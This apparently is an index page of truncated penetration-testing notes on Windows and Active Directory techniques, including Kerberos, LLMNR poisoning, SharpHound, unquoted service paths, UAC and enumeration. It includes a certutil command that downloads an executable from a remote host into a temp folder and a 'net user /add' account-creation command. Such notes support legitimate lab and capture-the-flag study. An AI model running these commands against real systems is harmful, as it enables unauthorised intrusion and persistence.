Explanation The Kerberos authentication protocol used by Microsoft is adopted from the Kerberos version 5 authentication protocol created by MIT and has been used as Microsoft’s primary authenticat...
To exploit PATH hijacking we need to identify two things: 1) that the script can be executed in another user’s context, and 2) that there is a missing relative path on a command or on a libra...
LLMNR (Link-Local Multicast Name Resolution) What is LLMNR? Link-Local Multicast Name Resolution. Used to identify hosts when DNS fails to do so. Previously known as NBT-NS. The main drawb...
Sharphound.exe First upload Sharphound to the system and then run the following commands from a folder where you can write as it will download a .zip file: # For SharpHound.ps1 (each line is a comm...
#Note It is possible that sometimes you need to use the host domain (e.g. sizzle.htb) NTPDATE ntpdate 10.10.11.102 RDATE rdate -n 10.10.11.102 DATE It is also possible to set the date “manually” ...
User create If we are able to create a user it is as simple as using the net.exe Windows utility: net user shuciran shucir4n /add Add user to a group If there is a group in the domain with some pr...
Another interesting attack vector that can lead to privilege escalation on Windows operating systems revolves around unquoted service paths. We can use this attack when we have write permissions to...
Even while logged in as an administrative user, the account will have two security tokens, one running at a medium integrity level and the other at high integrity level. UAC acts as the separation ...
certutil.exe -urlcache -f http://10.0.0.5/40564.exe C:\Windows\Temp\bad.exe Example: [[Forest#^8fde0e]] # Dump general information certutil -dump # Dump information about certificate authority ce...
System information systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" systeminfo | findstr /C:"sistema" # Spanish Installed updates wmic qfe get Caption, Description Installed ...